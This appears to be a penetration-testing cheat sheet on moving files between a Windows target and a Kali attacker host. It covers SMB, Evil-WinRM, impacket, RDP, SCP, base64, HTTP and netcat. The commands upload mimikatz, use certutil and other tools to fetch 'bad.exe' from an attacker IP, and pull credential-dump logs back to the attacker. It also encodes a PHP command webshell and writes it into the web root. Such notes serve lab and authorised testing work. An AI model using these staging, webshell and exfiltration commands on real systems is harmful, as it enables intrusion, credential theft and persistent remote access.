# File Transfer Tricks (Windows - Kali Linux)
Whether you are solving a machine/lab, or engaging in a penetration testing assessment there will be times where you are required to transfer a file, it can be from your host to the target's host (windows/linux) or vice versa. Here I share a few tricks on how you can transfer files from Windows Machine to your Kali host.
## Using SMB
With [impacket](https://www.kali.org/tools/impacket/) we can use the utility `impacket-smbserver` to start an SMB server and use it to transfer files from windows.
#### On Kali Host
```shell
impacket-smbserver test . -smb2support -username jojomojo -password jojomojo
```
#### On Windows
```powershell=
net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo
copy backup.zip m:\
```
>*Replace `YOUR_KALI_IP` with your Kali Linux host's IP.*
## Using Evil-WinRM
Evil-WinRM has built-in commands known as `upload` and `download` which can be used to upload and download files respectively.
#### Uploading Files To Windows
```shell=
upload /path/to/sourcefile C:\path\to\destinationfile
upload /home/kali/Desktop/chisel.exe C:\Users\testuser\chisel.exe
```
#### Downloading Files From Windows
```shell=
download C:\path\to\sourcefile /path/to/destinationfile
download C:\Users\testuser\Desktop\backup.zip /home/kali/Desktop/backup.zip
```
## Using Impacket Utilities
Some of the impacket utilities such as `impacket-psexec`, `impacket-wmiexec`, `impacket-smbexec` have built-in commands such as `lput` and `lget` that can be used to upload and download a file.
#### Uploading A File To Windows
> A file that is uploaded with this command, will be uploaded to the **C:\Windows\** directory.
```powershell=
C:\Windows\system32> lput mimikatz.exe
[*] Uploading mimikatz.exe to ADMIN$\/
C:\Windows\system32> cd C:\windows
C:\Windows> dir /b mimikatz.exe
mimikatz.exe
```
#### Downloading A File From Windows
```powershell=
C:\Windows> lget mimikatz.log
[*] Downloading ADMIN$\mimikatz.log
```
## Using RDP
If the windows machine has a RDP port open, we can mount shared folders and copy files.
#### On Kali Host
```shell
rdesktop -z -P -x m -u jojomojo -p lab 192.168.1.120 -r disk:test=/path/to/your/shared/dir
```
#### On Windows
```powershell
copy mimikatz.log \\tsclient\test\mimikatz.log
```
## Using SSH (SCP)
SCP can be useful especially when transferring large files.
#### Uploading A File To Windows
```shell
scp /home/kali/Desktop/bad.exe Administrator@192.168.1.102:'C:\Users\Administrator\Documents\good.exe'
```
#### Downloading A File From Windows
```shell
scp Administrator@192.168.1.102:'C:\Users\Administrator\Documents\important_file.zip' /home/kali/Documents/
```
## Using Base64
Base64 encoding/decoding can be used as a way to transfer files from/to windows.
#### Transferring File From Kali Linux To Windows
###### On Kali Host
Contents of webshell.php
```php
└─$ cat webshell.php
<?php echo shell_exec($_GET['cmd']); ?>
```
Encoding the content of webshell.php, you can use either one of these commands to encode the webshell to base64, then copy the output.
```shell=
└─$ base64 -w0 <<< cat webshell.php
└─$ cat webshell.php | base64 -w0
# output
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==
```
###### On Windows (Powershell)
```powershell
PS C:\Users\jojomojo\Documents> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==')) > C:\inetpub\wwwroot\shell.php
```
###### On Windows (certutil.exe)
```powershell=
C:\Users\jojomojo\Documents> echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== > enc
C:\Users\jojomojo\Documents> certutil -decode .\enc C:\inetpub\wwwroot\shell.php
```
## Using HTTP
#### On Kali Host
Run any of the commands below to start a HTTP webserver
```shell=
python3 -m http.server 80
python2 -m SimpleHTTPServer 80
```
#### On Windows
###### With certutil.exe
```powershell!
certutil.exe -urlcache -f http://192.168.1.120/test.exe bad.exe
```
###### With curl.exe
```powershell!
curl -s -O http://192.168.1.102/test.exe
```
###### With wget.exe
```powershell!
wget -o bad.exe http://192.168.1.102/test.exe
```
###### With iwr Powershell
```powershell=
Invoke-WebRequest -Uri "https://192.168.1.102/test.exe" -OutFile "C:\Downloads\bad.exe"
iwr http://192.168.1.102/test.exe -OutFile "C:\Downloads\bad.exe"
```
## Using Netcat (nc)
#### On kali host
```shell!
nc 10.1.1.17 443 < /home/kali/Desktop/bad.exe
```
#### On Windows
```powershell!
C:\Users\jojomojo\Test> nc.exe -l -p 443 > C:\Users\jojomojo\Documents\serviceRun.exe
```
Although there are more methods/techniques used to transfer files, the few mentioned above are most used methods in common pentesting scenarios allowing you to easily transfer files from windows to your kali linux host.